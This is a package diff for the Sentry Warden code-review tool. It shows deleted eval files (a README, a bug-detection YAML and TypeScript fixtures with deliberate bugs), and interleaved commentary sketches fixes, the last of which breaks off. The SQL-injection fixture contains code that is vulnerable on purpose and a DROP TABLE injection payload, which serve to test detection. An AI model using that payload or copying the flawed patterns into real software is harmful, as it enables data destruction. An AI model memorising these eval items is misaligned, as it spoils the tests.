@sentry/warden 0.12.0 → 0.14.0
- package/agents.lock +66 -0
- package/dist/cli/args.d.ts +17 -9
- package/dist/cli/args.d.ts.map +1 -1
- package/dist/cli/args.js +51 -2
- package/dist/cli/args.js.map +1 -1
- package/dist/cli/commands/add.js +1 -1
- package/dist/cli/commands/add.js.map +1 -1
- package/dist/cli/commands/init.d.ts +0 -3
- package/dist/cli/commands/init.d.ts.map +1 -1
- package/dist/cli/commands/init.js +219 -24
- package/dist/cli/commands/init.js.map +1 -1
- package/dist/cli/commands/logs.d.ts +19 -0
- package/dist/cli/commands/logs.d.ts.map +1 -0
- package/dist/cli/commands/logs.js +419 -0
- package/dist/cli/commands/logs.js.map +1 -0
- package/dist/cli/commands/sync.d.ts.map +1 -1
- package/dist/cli/commands/sync.js +16 -4
- package/dist/cli/commands/sync.js.map +1 -1
- package/dist/cli/fix.d.ts.map +1 -1
- package/dist/cli/fix.js +6 -1
- package/dist/cli/fix.js.map +1 -1
- package/dist/cli/log-cleanup.d.ts +6 -5
- package/dist/cli/log-cleanup.d.ts.map +1 -1
- package/dist/cli/log-cleanup.js +11 -10
- package/dist/cli/log-cleanup.js.map +1 -1
- package/dist/cli/main.d.ts.map +1 -1
- package/dist/cli/main.js +87 -29
- package/dist/cli/main.js.map +1 -1
- package/dist/cli/output/formatters.d.ts +8 -2
- package/dist/cli/output/formatters.d.ts.map +1 -1
- package/dist/cli/output/formatters.js +40 -19
- package/dist/cli/output/formatters.js.map +1 -1
- package/dist/cli/output/index.d.ts +2 -2
- package/dist/cli/output/index.d.ts.map +1 -1
- package/dist/cli/output/index.js +2 -2
- package/dist/cli/output/index.js.map +1 -1
- package/dist/cli/output/ink-runner.js +1 -1
- package/dist/cli/output/ink-runner.js.map +1 -1
- package/dist/cli/output/jsonl.d.ts +51 -14
- package/dist/cli/output/jsonl.d.ts.map +1 -1
- package/dist/cli/output/jsonl.js +140 -7
- package/dist/cli/output/jsonl.js.map +1 -1
- package/dist/cli/output/reporter.d.ts +4 -0
- package/dist/cli/output/reporter.d.ts.map +1 -1
- package/dist/cli/output/reporter.js +14 -0
- package/dist/cli/output/reporter.js.map +1 -1
- package/dist/cli/output/tasks.d.ts +3 -1
- package/dist/cli/output/tasks.d.ts.map +1 -1
- package/dist/cli/output/tasks.js +7 -4
- package/dist/cli/output/tasks.js.map +1 -1
- package/dist/cli/terminal.d.ts +4 -3
- package/dist/cli/terminal.d.ts.map +1 -1
- package/dist/cli/terminal.js +22 -11
- package/dist/cli/terminal.js.map +1 -1
- package/dist/config/loader.d.ts +3 -1
- package/dist/config/loader.d.ts.map +1 -1
- package/dist/config/loader.js +2 -0
- package/dist/config/loader.js.map +1 -1
- package/dist/config/schema.d.ts +84 -70
- package/dist/config/schema.d.ts.map +1 -1
- package/dist/config/schema.js +7 -1
- package/dist/config/schema.js.map +1 -1
- package/dist/evals/types.d.ts +9 -15
- package/dist/evals/types.d.ts.map +1 -1
- package/dist/index.d.ts +2 -2
- package/dist/index.d.ts.map +1 -1
- package/dist/index.js +2 -0
- package/dist/index.js.map +1 -1
- package/dist/output/dedup.d.ts +14 -10
- package/dist/output/dedup.d.ts.map +1 -1
- package/dist/output/dedup.js +39 -17
- package/dist/output/dedup.js.map +1 -1
- package/dist/output/github-checks.d.ts +5 -3
- package/dist/output/github-checks.d.ts.map +1 -1
- package/dist/output/github-checks.js +14 -16
- package/dist/output/github-checks.js.map +1 -1
- package/dist/output/issue-renderer.js +1 -1
- package/dist/output/issue-renderer.js.map +1 -1
- package/dist/output/renderer.d.ts.map +1 -1
- package/dist/output/renderer.js +11 -7
- package/dist/output/renderer.js.map +1 -1
- package/dist/output/types.d.ts +3 -1
- package/dist/output/types.d.ts.map +1 -1
- package/dist/sdk/analyze.d.ts.map +1 -1
- package/dist/sdk/analyze.js +12 -5
- package/dist/sdk/analyze.js.map +1 -1
- package/dist/sdk/auth.d.ts +16 -0
- package/dist/sdk/auth.d.ts.map +1 -0
- package/dist/sdk/auth.js +37 -0
- package/dist/sdk/auth.js.map +1 -0
- package/dist/sdk/errors.d.ts +5 -0
- package/dist/sdk/errors.d.ts.map +1 -1
- package/dist/sdk/errors.js +20 -0
- package/dist/sdk/errors.js.map +1 -1
- package/dist/sdk/prompt.d.ts.map +1 -1
- package/dist/sdk/prompt.js +3 -1
- package/dist/sdk/prompt.js.map +1 -1
- package/dist/sdk/runner.d.ts +2 -1
- package/dist/sdk/runner.d.ts.map +1 -1
- package/dist/sdk/runner.js +3 -1
- package/dist/sdk/runner.js.map +1 -1
- package/dist/skills/remote.d.ts +4 -0
- package/dist/skills/remote.d.ts.map +1 -1
- package/dist/skills/remote.js +47 -27
- package/dist/skills/remote.js.map +1 -1
- package/dist/types/index.d.ts +42 -22
- package/dist/types/index.d.ts.map +1 -1
- package/dist/types/index.js +45 -7
- package/dist/types/index.js.map +1 -1
- package/package.json +1 -1
- package/{plugins/warden/skills → skills}/warden/SKILL.md +2 -4
- package/{plugins/warden/skills → skills}/warden/references/cli-reference.md +7 -9
- package/{plugins/warden/skills → skills}/warden/references/config-schema.md +5 -7
- package/{plugins/warden/skills → skills}/warden/references/configuration.md +10 -8
- package/{plugins/warden/skills → skills}/warden/references/creating-skills.md +6 -6
- package/skills/warden-sweep/SKILL.md +407 -0
- package/skills/warden-sweep/scripts/_utils.py +37 -0
- package/skills/warden-sweep/scripts/extract_findings.py +219 -0
- package/skills/warden-sweep/scripts/find_reviewers.py +115 -0
- package/skills/warden-sweep/scripts/generate_report.py +271 -0
- package/skills/warden-sweep/scripts/index_prs.py +187 -0
- package/skills/warden-sweep/scripts/organize.py +315 -0
- package/skills/warden-sweep/scripts/scan.py +632 -0
- package/.claude-plugin/marketplace.json +0 -20
- package/.mcp.json +0 -8
- package/agents.toml +0 -7
- package/conductor.json +0 -8
- package/evals/README.md +0 -154
- package/evals/bug-detection.yaml +0 -56
- package/evals/fixtures/ignores-style-issues/utils.ts +0 -48
- package/evals/fixtures/missing-await/cache.ts +0 -45
- package/evals/fixtures/null-property-access/handler.ts +0 -36
- package/evals/fixtures/off-by-one/paginator.ts +0 -38
- package/evals/fixtures/sql-injection/api.ts +0 -59
- package/evals/fixtures/stale-closure/counter.tsx +0 -33
- package/evals/fixtures/wrong-comparison/validator.ts +0 -52
- package/evals/fixtures/xss-reflected/server.ts +0 -55
- package/evals/precision.yaml +0 -15
- package/evals/security-scanning.yaml +0 -24
- package/evals/skills/bug-detection.md +0 -33
- package/evals/skills/precision.md +0 -18
- package/evals/skills/security-scanning.md +0 -32
- package/plugins/.claude-plugin/marketplace.json +0 -14
- package/plugins/warden/.claude-plugin/plugin.json +0 -7
- package/scripts/update-pricing.ts +0 -88
package/evals/README.md
DELETED
|
@@ -1,154 +0,0 @@
|
|
|
1
|
-
# Warden Evals
|
|
2
|
-
|
|
3
|
-
End-to-end behavioral evaluations for the Warden pipeline. These evals verify
|
|
4
|
-
that Warden correctly runs skills, invokes the agent, extracts findings, and
|
|
5
|
-
produces the expected behavioral outcomes on known code.
|
|
6
|
-
|
|
7
|
-
## Philosophy
|
|
8
|
-
|
|
9
|
-
Evals are not unit tests or A/B comparisons. They answer one question:
|
|
10
|
-
|
|
11
|
-
> **Does the Warden pipeline behave correctly when given known inputs?**
|
|
12
|
-
|
|
13
|
-
Each eval provides code with a known issue, runs the full Warden agent pipeline
|
|
14
|
-
(skill loading, prompt construction, SDK invocation, finding extraction), and
|
|
15
|
-
uses an LLM judge to verify the output matches behavioral expectations.
|
|
16
|
-
|
|
17
|
-
Evals test **Warden's behavior**, not individual skills. Skills are used as
|
|
18
|
-
test vehicles to exercise the pipeline.
|
|
19
|
-
|
|
20
|
-
The only thing mocked is the GitHub event payload. Everything else runs for
|
|
21
|
-
real.
|
|
22
|
-
|
|
23
|
-
## YAML Format
|
|
24
|
-
|
|
25
|
-
Evals are defined in YAML files at the top level of `evals/`. Each file
|
|
26
|
-
describes a category of behaviors with a shared test skill and a list of
|
|
27
|
-
scenarios. No custom code per eval. Adding a new eval means adding an entry
|
|
28
|
-
to a YAML file and a fixture file.
|
|
29
|
-
|
|
30
|
-
```yaml
|
|
31
|
-
skill: skills/bug-detection.md
|
|
32
|
-
|
|
33
|
-
evals:
|
|
34
|
-
- name: null-property-access
|
|
35
|
-
given: code that accesses properties on an array .find() result without null checking
|
|
36
|
-
files:
|
|
37
|
-
- fixtures/null-property-access/handler.ts
|
|
38
|
-
should_find:
|
|
39
|
-
- finding: accessing .name on a potentially undefined user object from Array.find()
|
|
40
|
-
severity: high
|
|
41
|
-
should_not_find:
|
|
42
|
-
- style, formatting, or naming issues
|
|
43
|
-
- the lack of try/catch around the fetch call
|
|
44
|
-
```
|
|
45
|
-
|
|
46
|
-
This reads as:
|
|
47
|
-
|
|
48
|
-
> **Given** code that accesses properties on an array `.find()` result without
|
|
49
|
-
> null checking, Warden **should find** a null access bug and **should not
|
|
50
|
-
> find** style issues.
|
|
51
|
-
|
|
52
|
-
## Eval Structure
|
|
53
|
-
|
|
54
|
-
```
|
|
55
|
-
evals/
|
|
56
|
-
├── README.md
|
|
57
|
-
├── bug-detection.yaml # Category: finding logic bugs
|
|
58
|
-
├── security-scanning.yaml # Category: finding security vulnerabilities
|
|
59
|
-
├── precision.yaml # Category: avoiding false positives
|
|
60
|
-
├── skills/ # Test skills (vehicles for exercising pipeline)
|
|
61
|
-
│ ├── bug-detection.md
|
|
62
|
-
│ ├── security-scanning.md
|
|
63
|
-
│ └── precision.md
|
|
64
|
-
└── fixtures/ # Source code with known issues
|
|
65
|
-
├── null-property-access/
|
|
66
|
-
│ └── handler.ts
|
|
67
|
-
├── off-by-one/
|
|
68
|
-
│ └── paginator.ts
|
|
69
|
-
├── missing-await/
|
|
70
|
-
│ └── cache.ts
|
|
71
|
-
├── wrong-comparison/
|
|
72
|
-
│ └── validator.ts
|
|
73
|
-
├── stale-closure/
|
|
74
|
-
│ └── counter.tsx
|
|
75
|
-
├── sql-injection/
|
|
76
|
-
│ └── api.ts
|
|
77
|
-
├── xss-reflected/
|
|
78
|
-
│ └── server.ts
|
|
79
|
-
└── ignores-style-issues/
|
|
80
|
-
└── utils.ts
|
|
81
|
-
```
|
|
82
|
-
|
|
83
|
-
## YAML Schema
|
|
84
|
-
|
|
85
|
-
### File-level fields
|
|
86
|
-
|
|
87
|
-
| Field | Required | Description |
|
|
88
|
-
|-------|----------|-------------|
|
|
89
|
-
| `skill` | Yes | Path to test skill, relative to `evals/` |
|
|
90
|
-
| `model` | No | Default model for all evals (default: `claude-sonnet-4-6`) |
|
|
91
|
-
| `evals` | Yes | List of eval scenarios (at least one) |
|
|
92
|
-
|
|
93
|
-
### Per-eval fields
|
|
94
|
-
|
|
95
|
-
| Field | Required | Description |
|
|
96
|
-
|-------|----------|-------------|
|
|
97
|
-
| `name` | Yes | Scenario name (used in test output) |
|
|
98
|
-
| `given` | Yes | What code/situation the eval sets up (BDD "given") |
|
|
99
|
-
| `files` | Yes | Fixture files, relative to `evals/` |
|
|
100
|
-
| `model` | No | Model override for this scenario |
|
|
101
|
-
| `should_find` | Yes | What the pipeline should detect (at least one) |
|
|
102
|
-
| `should_find[].finding` | Yes | Natural language description for the LLM judge |
|
|
103
|
-
| `should_find[].severity` | No | Expected severity (hint, not strict) |
|
|
104
|
-
| `should_find[].required` | No | If true (default), eval fails when not found |
|
|
105
|
-
| `should_not_find` | No | Things the pipeline should NOT report (precision) |
|
|
106
|
-
|
|
107
|
-
## Running Evals
|
|
108
|
-
|
|
109
|
-
```bash
|
|
110
|
-
# Run all evals (requires ANTHROPIC_API_KEY)
|
|
111
|
-
pnpm test:evals
|
|
112
|
-
|
|
113
|
-
# Run evals for a specific category
|
|
114
|
-
pnpm test:evals -- --grep "bug-detection"
|
|
115
|
-
|
|
116
|
-
# Run a single eval
|
|
117
|
-
pnpm test:evals -- --grep "null-property-access"
|
|
118
|
-
```
|
|
119
|
-
|
|
120
|
-
Evals make real API calls. They run skills on `claude-sonnet-4-6` by
|
|
121
|
-
default.
|
|
122
|
-
|
|
123
|
-
## Adding a New Eval
|
|
124
|
-
|
|
125
|
-
1. Pick an existing YAML file or create a new `evals/<category>.yaml`
|
|
126
|
-
2. Add a scenario entry under the `evals:` key
|
|
127
|
-
3. Create a fixture file under `evals/fixtures/<scenario>/`
|
|
128
|
-
4. Run `pnpm test:evals` to verify
|
|
129
|
-
|
|
130
|
-
If a new category needs a different test skill, add it to `evals/skills/`.
|
|
131
|
-
|
|
132
|
-
### Guidelines
|
|
133
|
-
|
|
134
|
-
- **One bug per eval.** Each scenario tests one specific behavior.
|
|
135
|
-
- **Make bugs realistic.** Code should look like something a human wrote.
|
|
136
|
-
- **Write precise `should_find`.** "null access on user.name from Array.find()"
|
|
137
|
-
is better than "finds a bug."
|
|
138
|
-
- **Include `should_not_find`.** If the code has issues the skill should ignore,
|
|
139
|
-
call them out.
|
|
140
|
-
- **Keep fixtures small.** 20-80 lines. The agent analyzes hunks, not novels.
|
|
141
|
-
- **No custom code.** Every eval is just YAML + fixture files.
|
|
142
|
-
|
|
143
|
-
## How It Works
|
|
144
|
-
|
|
145
|
-
1. **Discovery**: Scan `evals/` for `.yaml` files
|
|
146
|
-
2. **Loading**: Parse YAML, validate with Zod, resolve paths
|
|
147
|
-
3. **Git repo**: Create a temp repo with fixture files committed on an `eval`
|
|
148
|
-
branch (empty `main` as base), so the agent has a real repo to explore
|
|
149
|
-
4. **Context**: Build `EventContext` from real `git diff main...eval`
|
|
150
|
-
5. **Execution**: Run the skill via `runSkill()` with the real SDK pipeline;
|
|
151
|
-
the agent operates in the temp repo with Read/Grep tools
|
|
152
|
-
6. **Judgment**: An LLM judge (Sonnet) evaluates findings against assertions
|
|
153
|
-
7. **Verdict**: Pass if all required `should_find` are met and no
|
|
154
|
-
`should_not_find` are violated
|
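The schema tables and the verdict rule (step 7) in the deleted README above can be sketched in TypeScript. This is a minimal illustration, not Warden's code: the names `ShouldFind`, `EvalScenario`, `JudgeResult`, and `verdict` are hypothetical, and the shape of the judge's output (one boolean per assertion) is an assumption.

```typescript
// Hypothetical types mirroring the README's per-eval fields; not Warden's actual definitions.
interface ShouldFind {
  finding: string;     // natural-language description for the LLM judge
  severity?: string;   // expected severity (a hint, not strict)
  required?: boolean;  // the README states this defaults to true
}

interface EvalScenario {
  name: string;
  given: string;
  files: string[];
  model?: string;
  should_find: ShouldFind[];
  should_not_find?: string[];
}

// Assumed judge output: one boolean per assertion, in declaration order.
interface JudgeResult {
  found: boolean[];    // found[i] is true when should_find[i] was met
  violated: boolean[]; // violated[j] is true when should_not_find[j] was reported
}

// Pass if every required should_find is met and no should_not_find is violated.
function verdict(scenario: EvalScenario, judged: JudgeResult): boolean {
  const requiredMet = scenario.should_find.every(
    (expectation, i) => expectation.required === false || judged.found[i] === true
  );
  const noneViolated = judged.violated.every((v) => !v);
  return requiredMet && noneViolated;
}
```

Treating `required` as true unless it is explicitly `false` matches the README's stated default; a non-required expectation (as in `precision.yaml`) never fails the eval on its own.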
package/evals/bug-detection.yaml
DELETED
|
@@ -1,56 +0,0 @@
|
|
|
1
|
-
skill: skills/bug-detection.md
|
|
2
|
-
|
|
3
|
-
evals:
|
|
4
|
-
- name: null-property-access
|
|
5
|
-
given: code that accesses properties on an array .find() result without null checking
|
|
6
|
-
files:
|
|
7
|
-
- fixtures/null-property-access/handler.ts
|
|
8
|
-
should_find:
|
|
9
|
-
- finding: accessing .name and .profile.avatar on a potentially undefined user object from Array.find()
|
|
10
|
-
severity: high
|
|
11
|
-
should_not_find:
|
|
12
|
-
- style, formatting, or naming issues
|
|
13
|
-
- the lack of try/catch around the fetch call
|
|
14
|
-
|
|
15
|
-
- name: off-by-one
|
|
16
|
-
given: pagination logic that uses Math.floor instead of Math.ceil, skipping the last page
|
|
17
|
-
files:
|
|
18
|
-
- fixtures/off-by-one/paginator.ts
|
|
19
|
-
should_find:
|
|
20
|
-
- finding: off-by-one error in page count calculation that loses the last page when totalItems is not evenly divisible by pageSize
|
|
21
|
-
severity: medium
|
|
22
|
-
should_not_find:
|
|
23
|
-
- use of any[] type
|
|
24
|
-
- missing error handling
|
|
25
|
-
|
|
26
|
-
- name: missing-await
|
|
27
|
-
given: async cache lookup missing await, causing a Promise object to be used as a truthy value
|
|
28
|
-
files:
|
|
29
|
-
- fixtures/missing-await/cache.ts
|
|
30
|
-
should_find:
|
|
31
|
-
- finding: missing await on loadFromCache() call, so cached is always a truthy Promise and the function never actually fetches fresh data
|
|
32
|
-
severity: high
|
|
33
|
-
should_not_find:
|
|
34
|
-
- console.log statements
|
|
35
|
-
- missing return type annotations
|
|
36
|
-
|
|
37
|
-
- name: wrong-comparison
|
|
38
|
-
given: permission check using <= instead of >=, inverting the access control logic
|
|
39
|
-
files:
|
|
40
|
-
- fixtures/wrong-comparison/validator.ts
|
|
41
|
-
should_find:
|
|
42
|
-
- finding: comparison operator is <= instead of >=, granting access to lower-privilege users while denying higher-privilege users
|
|
43
|
-
severity: high
|
|
44
|
-
should_not_find:
|
|
45
|
-
- hardcoded role strings
|
|
46
|
-
- suggestion to use an enum for roles
|
|
47
|
-
|
|
48
|
-
- name: stale-closure
|
|
49
|
-
given: React useEffect with setInterval that captures count in a stale closure
|
|
50
|
-
files:
|
|
51
|
-
- fixtures/stale-closure/counter.tsx
|
|
52
|
-
should_find:
|
|
53
|
-
- finding: "stale closure: setInterval callback captures initial count value and never sees updates, so the counter always sets the same value"
|
|
54
|
-
severity: high
|
|
55
|
-
should_not_find:
|
|
56
|
-
- TypeScript type annotation issues
|
package/evals/fixtures/ignores-style-issues/utils.ts
DELETED
|
@@ -1,48 +0,0 @@
|
|
|
1
|
-
// This code is functionally correct but has style issues.
|
|
2
|
-
// A precision-focused eval: the skill should NOT report any of these as bugs.
|
|
3
|
-
|
|
4
|
-
// Inconsistent naming convention (camelCase vs snake_case)
|
|
5
|
-
export function calculate_total(items: number[]): number {
|
|
6
|
-
let runningTotal = 0;
|
|
7
|
-
for (let i = 0; i < items.length; i++) {
|
|
8
|
-
runningTotal = runningTotal + items[i]!;
|
|
9
|
-
}
|
|
10
|
-
return runningTotal;
|
|
11
|
-
}
|
|
12
|
-
|
|
13
|
-
// Verbose conditional (could be simplified but is correct)
|
|
14
|
-
export function isEligible(age: number, hasConsent: boolean): boolean {
|
|
15
|
-
if (age >= 18) {
|
|
16
|
-
if (hasConsent === true) {
|
|
17
|
-
return true;
|
|
18
|
-
} else {
|
|
19
|
-
return false;
|
|
20
|
-
}
|
|
21
|
-
} else {
|
|
22
|
-
return false;
|
|
23
|
-
}
|
|
24
|
-
}
|
|
25
|
-
|
|
26
|
-
// Missing JSDoc, long parameter list, but functionally correct
|
|
27
|
-
export function formatAddress(
|
|
28
|
-
street: string,
|
|
29
|
-
city: string,
|
|
30
|
-
state: string,
|
|
31
|
-
zip: string,
|
|
32
|
-
country: string
|
|
33
|
-
): string {
|
|
34
|
-
const parts = [street, city, state, zip, country];
|
|
35
|
-
return parts.filter((p) => p.length > 0).join(', ');
|
|
36
|
-
}
|
|
37
|
-
|
|
38
|
-
// Magic numbers but correct behavior
|
|
39
|
-
export function calculateDiscount(price: number, quantity: number): number {
|
|
40
|
-
if (quantity >= 100) {
|
|
41
|
-
return price * 0.8;
|
|
42
|
-
} else if (quantity >= 50) {
|
|
43
|
-
return price * 0.9;
|
|
44
|
-
} else if (quantity >= 10) {
|
|
45
|
-
return price * 0.95;
|
|
46
|
-
}
|
|
47
|
-
return price;
|
|
48
|
-
}
|
package/evals/fixtures/missing-await/cache.ts
DELETED
|
@@ -1,45 +0,0 @@
|
|
|
1
|
-
interface CacheEntry {
|
|
2
|
-
key: string;
|
|
3
|
-
value: string;
|
|
4
|
-
expiresAt: number;
|
|
5
|
-
}
|
|
6
|
-
|
|
7
|
-
const store = new Map<string, CacheEntry>();
|
|
8
|
-
|
|
9
|
-
async function saveToCache(key: string, value: string, ttlMs: number): Promise<void> {
|
|
10
|
-
// Simulate async storage (e.g., Redis, database)
|
|
11
|
-
await new Promise((resolve) => setTimeout(resolve, 1));
|
|
12
|
-
store.set(key, {
|
|
13
|
-
key,
|
|
14
|
-
value,
|
|
15
|
-
expiresAt: Date.now() + ttlMs,
|
|
16
|
-
});
|
|
17
|
-
}
|
|
18
|
-
|
|
19
|
-
async function loadFromCache(key: string): Promise<string | null> {
|
|
20
|
-
await new Promise((resolve) => setTimeout(resolve, 1));
|
|
21
|
-
const entry = store.get(key);
|
|
22
|
-
if (!entry) return null;
|
|
23
|
-
if (Date.now() > entry.expiresAt) {
|
|
24
|
-
store.delete(key);
|
|
25
|
-
return null;
|
|
26
|
-
}
|
|
27
|
-
return entry.value;
|
|
28
|
-
}
|
|
29
|
-
|
|
30
|
-
export async function getOrFetchData(key: string, fetchFn: () => Promise<string>): Promise<string> {
|
|
31
|
-
// Bug: missing await on loadFromCache. The result `cached` will be a
|
|
32
|
-
// Promise, which is truthy, so the function always returns a Promise
|
|
33
|
-
// object (as a string) instead of the actual cached value.
|
|
34
|
-
const cached = loadFromCache(key);
|
|
35
|
-
|
|
36
|
-
if (cached) {
|
|
37
|
-
console.log('Cache hit:', key);
|
|
38
|
-
return cached as unknown as string;
|
|
39
|
-
}
|
|
40
|
-
|
|
41
|
-
console.log('Cache miss:', key);
|
|
42
|
-
const fresh = await fetchFn();
|
|
43
|
-
await saveToCache(key, fresh, 60_000);
|
|
44
|
-
return fresh;
|
|
45
|
-
}
|
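The bug comment in the fixture above implies a one-word fix. The sketch below is a self-contained illustration, not the package's code: `loadFromCache` is a simplified in-memory stand-in (TTL handling is omitted, which is an assumption made for brevity). It shows why the un-awaited value is always truthy and what awaiting changes.

```typescript
// Simplified stand-in for the fixture's cache; expiry handling is omitted.
const store = new Map<string, string>();

async function loadFromCache(key: string): Promise<string | null> {
  return store.get(key) ?? null;
}

// Awaited variant: `cached` is a string or null, so the miss branch is reachable.
async function getOrFetchData(key: string, fetchFn: () => Promise<string>): Promise<string> {
  const cached = await loadFromCache(key);
  if (cached !== null) {
    return cached;
  }
  const fresh = await fetchFn();
  store.set(key, fresh);
  return fresh;
}

// Without await, the call yields a Promise object, which is truthy even on a miss.
const unawaited = loadFromCache("absent");
const alwaysTruthy = Boolean(unawaited);
```

Comparing against `null` explicitly, rather than relying on truthiness, also keeps an empty-string cache entry from being treated as a miss.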
package/evals/fixtures/null-property-access/handler.ts
DELETED
|
@@ -1,36 +0,0 @@
|
|
|
1
|
-
interface User {
|
|
2
|
-
id: string;
|
|
3
|
-
name: string;
|
|
4
|
-
email: string;
|
|
5
|
-
profile: {
|
|
6
|
-
avatar: string;
|
|
7
|
-
bio: string;
|
|
8
|
-
};
|
|
9
|
-
}
|
|
10
|
-
|
|
11
|
-
interface ApiResponse {
|
|
12
|
-
users: User[];
|
|
13
|
-
total: number;
|
|
14
|
-
}
|
|
15
|
-
|
|
16
|
-
async function fetchUsers(endpoint: string): Promise<ApiResponse> {
|
|
17
|
-
const response = await fetch(endpoint);
|
|
18
|
-
return response.json() as Promise<ApiResponse>;
|
|
19
|
-
}
|
|
20
|
-
|
|
21
|
-
export async function getUserDisplayName(userId: string): Promise<string> {
|
|
22
|
-
const data = await fetchUsers(`/api/users?id=${userId}`);
|
|
23
|
-
const user = data.users.find((u) => u.id === userId);
|
|
24
|
-
|
|
25
|
-
// Bug: user could be undefined if not found in the array,
|
|
26
|
-
// but we access .name without checking
|
|
27
|
-
const displayName = user.name;
|
|
28
|
-
const avatarUrl = user.profile.avatar;
|
|
29
|
-
|
|
30
|
-
return `${displayName} (${avatarUrl})`;
|
|
31
|
-
}
|
|
32
|
-
|
|
33
|
-
export async function getTeamMembers(teamId: string): Promise<string[]> {
|
|
34
|
-
const data = await fetchUsers(`/api/teams/${teamId}/members`);
|
|
35
|
-
return data.users.map((u) => u.name);
|
|
36
|
-
}
|
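For comparison with the fixture above, a guarded lookup might look like the following. This is a minimal sketch: `displayNameFor` is a hypothetical helper, and returning `undefined` for a missing user is one possible design choice among several (throwing or returning a fallback string would also work).

```typescript
interface User {
  id: string;
  name: string;
  profile: { avatar: string };
}

// Array.prototype.find returns undefined when nothing matches, so guard before use.
function displayNameFor(users: User[], userId: string): string | undefined {
  const user = users.find((u) => u.id === userId);
  if (user === undefined) {
    return undefined; // the caller decides how to handle a missing user
  }
  return `${user.name} (${user.profile.avatar})`;
}
```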
package/evals/fixtures/off-by-one/paginator.ts
DELETED
|
@@ -1,38 +0,0 @@
|
|
|
1
|
-
export interface PaginatedResult<T> {
|
|
2
|
-
items: T[];
|
|
3
|
-
page: number;
|
|
4
|
-
totalItems: number;
|
|
5
|
-
pageSize: number;
|
|
6
|
-
}
|
|
7
|
-
|
|
8
|
-
/**
|
|
9
|
-
* Fetch all pages of results from a paginated API endpoint.
|
|
10
|
-
* Collects items from every page and returns them as a flat array.
|
|
11
|
-
*/
|
|
12
|
-
export async function fetchAllPages<T>(
|
|
13
|
-
fetchPage: (page: number) => Promise<PaginatedResult<T>>
|
|
14
|
-
): Promise<T[]> {
|
|
15
|
-
const firstPage = await fetchPage(1);
|
|
16
|
-
const allItems: T[] = [...firstPage.items];
|
|
17
|
-
|
|
18
|
-
// Bug: Math.floor loses the last page when totalItems is not evenly
|
|
19
|
-
// divisible by pageSize. E.g., 25 items / 10 per page = 2.5, floored
|
|
20
|
-
// to 2, so page 3 (items 21-25) is never fetched.
|
|
21
|
-
const totalPages = Math.floor(firstPage.totalItems / firstPage.pageSize);
|
|
22
|
-
|
|
23
|
-
for (let page = 2; page <= totalPages; page++) {
|
|
24
|
-
const result = await fetchPage(page);
|
|
25
|
-
allItems.push(...result.items);
|
|
26
|
-
}
|
|
27
|
-
|
|
28
|
-
return allItems;
|
|
29
|
-
}
|
|
30
|
-
|
|
31
|
-
/**
|
|
32
|
-
* Get a specific page range of results.
|
|
33
|
-
*/
|
|
34
|
-
export function getPageRange(totalItems: number, pageSize: number, currentPage: number): { start: number; end: number } {
|
|
35
|
-
const start = (currentPage - 1) * pageSize;
|
|
36
|
-
const end = Math.min(start + pageSize, totalItems);
|
|
37
|
-
return { start, end };
|
|
38
|
-
}
|
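The arithmetic in the fixture's bug comment (25 items at 10 per page) can be checked directly. The sketch below contrasts the floored count with a rounded-up count; `totalPages` is a hypothetical helper name, not something from the package.

```typescript
// Page count must round up so a partial final page is still counted.
function totalPages(totalItems: number, pageSize: number): number {
  return Math.ceil(totalItems / pageSize);
}

const floored = Math.floor(25 / 10); // 2: page 3 (items 21-25) would be skipped
const ceiled = totalPages(25, 10);   // 3: every page is visited
```

When `totalItems` divides evenly by `pageSize`, both roundings agree, which is why the bug only shows up with a partial last page.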
package/evals/fixtures/sql-injection/api.ts
DELETED
|
@@ -1,59 +0,0 @@
|
|
|
1
|
-
interface DbConnection {
|
|
2
|
-
query(sql: string): Promise<Record<string, unknown>[]>;
|
|
3
|
-
}
|
|
4
|
-
|
|
5
|
-
function getConnection(): DbConnection {
|
|
6
|
-
// In production this returns a real DB connection
|
|
7
|
-
return {
|
|
8
|
-
query: async (sql: string) => {
|
|
9
|
-
console.log('Executing:', sql);
|
|
10
|
-
return [];
|
|
11
|
-
},
|
|
12
|
-
};
|
|
13
|
-
}
|
|
14
|
-
|
|
15
|
-
interface SearchParams {
|
|
16
|
-
name?: string;
|
|
17
|
-
email?: string;
|
|
18
|
-
role?: string;
|
|
19
|
-
}
|
|
20
|
-
|
|
21
|
-
/**
|
|
22
|
-
* Search for users matching the given criteria.
|
|
23
|
-
* Builds a dynamic WHERE clause from the search parameters.
|
|
24
|
-
*/
|
|
25
|
-
export async function searchUsers(params: SearchParams): Promise<Record<string, unknown>[]> {
|
|
26
|
-
const db = getConnection();
|
|
27
|
-
const conditions: string[] = [];
|
|
28
|
-
|
|
29
|
-
if (params.name) {
|
|
30
|
-
// Bug: Direct string interpolation of user input into SQL query.
|
|
31
|
-
// An attacker can pass name = "'; DROP TABLE users; --" to execute
|
|
32
|
-
// arbitrary SQL.
|
|
33
|
-
conditions.push(`name = '${params.name}'`);
|
|
34
|
-
}
|
|
35
|
-
if (params.email) {
|
|
36
|
-
conditions.push(`email = '${params.email}'`);
|
|
37
|
-
}
|
|
38
|
-
if (params.role) {
|
|
39
|
-
conditions.push(`role = '${params.role}'`);
|
|
40
|
-
}
|
|
41
|
-
|
|
42
|
-
const whereClause = conditions.length > 0
|
|
43
|
-
? `WHERE ${conditions.join(' AND ')}`
|
|
44
|
-
: '';
|
|
45
|
-
|
|
46
|
-
const sql = `SELECT id, name, email, role FROM users ${whereClause}`;
|
|
47
|
-
return db.query(sql);
|
|
48
|
-
}
|
|
49
|
-
|
|
50
|
-
/**
|
|
51
|
-
* Get a user by their ID (this one is safe - uses parameterized approach).
|
|
52
|
-
*/
|
|
53
|
-
export async function getUserById(id: number): Promise<Record<string, unknown> | null> {
|
|
54
|
-
const db = getConnection();
|
|
55
|
-
// This is safe because we validate the type
|
|
56
|
-
if (!Number.isInteger(id) || id <= 0) return null;
|
|
57
|
-
const results = await db.query(`SELECT * FROM users WHERE id = ${id}`);
|
|
58
|
-
return results[0] ?? null;
|
|
59
|
-
}
|
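A parameterized alternative to the interpolated WHERE clause above could be sketched as follows. Assumptions are labeled in the code: `buildSearchQuery` and `ParameterizedQuery` are hypothetical names, the `$1`-style numbered placeholders follow PostgreSQL conventions, and the fixture's `DbConnection.query(sql)` would need a second argument for the values, which it does not have as written.

```typescript
interface SearchParams {
  name?: string;
  email?: string;
  role?: string;
}

// Hypothetical result shape: SQL text plus the values to bind separately.
interface ParameterizedQuery {
  sql: string;
  values: string[];
}

// Builds the WHERE clause from fixed column names and numbered placeholders;
// user input only ever appears in `values`, never in the SQL text.
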